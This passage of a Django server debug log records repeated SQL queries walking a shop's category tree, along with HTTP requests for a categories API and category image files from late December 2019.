"shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-29 19:45:44,599 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-29 19:45:44,602 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-29 19:45:44,604 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-29 19:45:44,607 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-29 19:45:44,609 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-29 19:45:44,612 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-29 19:45:44,614 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [29/Dec/2019 19:45:44] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [29/Dec/2019 19:45:44] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [29/Dec/2019 19:45:44] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 200 600645 [29/Dec/2019 19:45:44] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 200 379075 [29/Dec/2019 19:45:44] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [29/Dec/2019 19:45:44] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 200 784410 [29/Dec/2019 19:45:44] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 200 309908 DEBUG 2019-12-29 19:45:45,873 utils 2749 140297222735616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-29 19:45:45,881 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [29/Dec/2019 19:45:45] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-29 19:45:45,950 utils 2749 140297222735616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-29 19:45:45,958 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-29 19:45:45,962 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-29 19:45:45,964 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-29 19:45:45,969 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-29 19:45:45,971 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-29 19:45:45,973 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-29 19:45:45,979 utils 2749 140297222735616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-29 19:45:45,984 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-29 19:45:45,989 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-29 19:45:45,993 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-29 19:45:45,996 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-29 19:45:45,998 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-29 19:45:46,001 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-29 19:45:46,005 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-29 19:45:46,007 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-29 19:45:46,011 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-29 19:45:46,015 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-29 19:45:46,019 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-29 19:45:46,025 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) [29/Dec/2019 19:45:46] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 200 784410 DEBUG 2019-12-29 19:45:46,028 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-29 19:45:46,030 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-29 19:45:46,032 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-29 19:45:46,035 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-29 19:45:46,037 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-29 19:45:46,041 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-29 19:45:46,043 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-29 19:45:46,046 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-29 19:45:46,048 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-29 19:45:46,050 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-29 19:45:46,054 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-29 19:45:46,056 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-29 19:45:46,059 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-29 19:45:46,061 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-29 19:45:46,064 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-29 19:45:46,068 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-29 19:45:46,070 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-29 19:45:46,073 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-29 19:45:46,076 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-29 19:45:46,078 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-29 19:45:46,080 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-29 19:45:46,083 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-29 19:45:46,086 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-29 19:45:46,088 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-29 19:45:46,091 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-29 19:45:46,096 utils 2749 140297222735616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [29/Dec/2019 19:45:46] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [29/Dec/2019 19:45:46] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 200 784410 [29/Dec/2019 19:45:46] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 200 379075 [29/Dec/2019 19:45:46] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [29/Dec/2019 19:45:46] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 200 784410 [29/Dec/2019 19:45:46] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [29/Dec/2019 19:45:46] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 200 784410 [29/Dec/2019 19:45:46] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 200 784410 [29/Dec/2019 19:45:47] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 200 432480 [29/Dec/2019 19:45:47] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 200 379075 [29/Dec/2019 19:45:47] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [29/Dec/2019 19:45:47] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [29/Dec/2019 19:45:47] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [29/Dec/2019 19:45:47] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [29/Dec/2019 19:45:47] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [29/Dec/2019 19:45:47] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 200 600645 [29/Dec/2019 19:45:47] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 200 784410 [29/Dec/2019 19:45:47] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 [29/Dec/2019 19:45:47] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 200 379075 [29/Dec/2019 19:45:47] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 200 379075 [29/Dec/2019 19:45:48] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 200 432480 [29/Dec/2019 19:45:48] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 200 432480 [29/Dec/2019 19:45:48] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 200 432480 [29/Dec/2019 19:45:48] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 200 432480 [29/Dec/2019 19:45:48] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 200 376652 [29/Dec/2019 19:45:48] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 200 376652 [29/Dec/2019 19:45:48] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 200 376652 [29/Dec/2019 19:45:48] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 200 376652 [29/Dec/2019 19:45:48] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 200 454674 [29/Dec/2019 19:45:48] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 200 454674 [29/Dec/2019 19:45:48] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 200 454674 [29/Dec/2019 19:45:48] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 200 454674 [29/Dec/2019 19:45:48] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 200 454674 [29/Dec/2019 19:45:48] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 200 523712 [29/Dec/2019 19:45:48] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 200 700594 [29/Dec/2019 19:45:49] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 200 284188 [29/Dec/2019 19:45:49] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 200 284188 DEBUG 2019-12-29 19:45:54,363 utils 2749 140297243715328 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-29 19:45:54,368 utils 2749 140297243715328 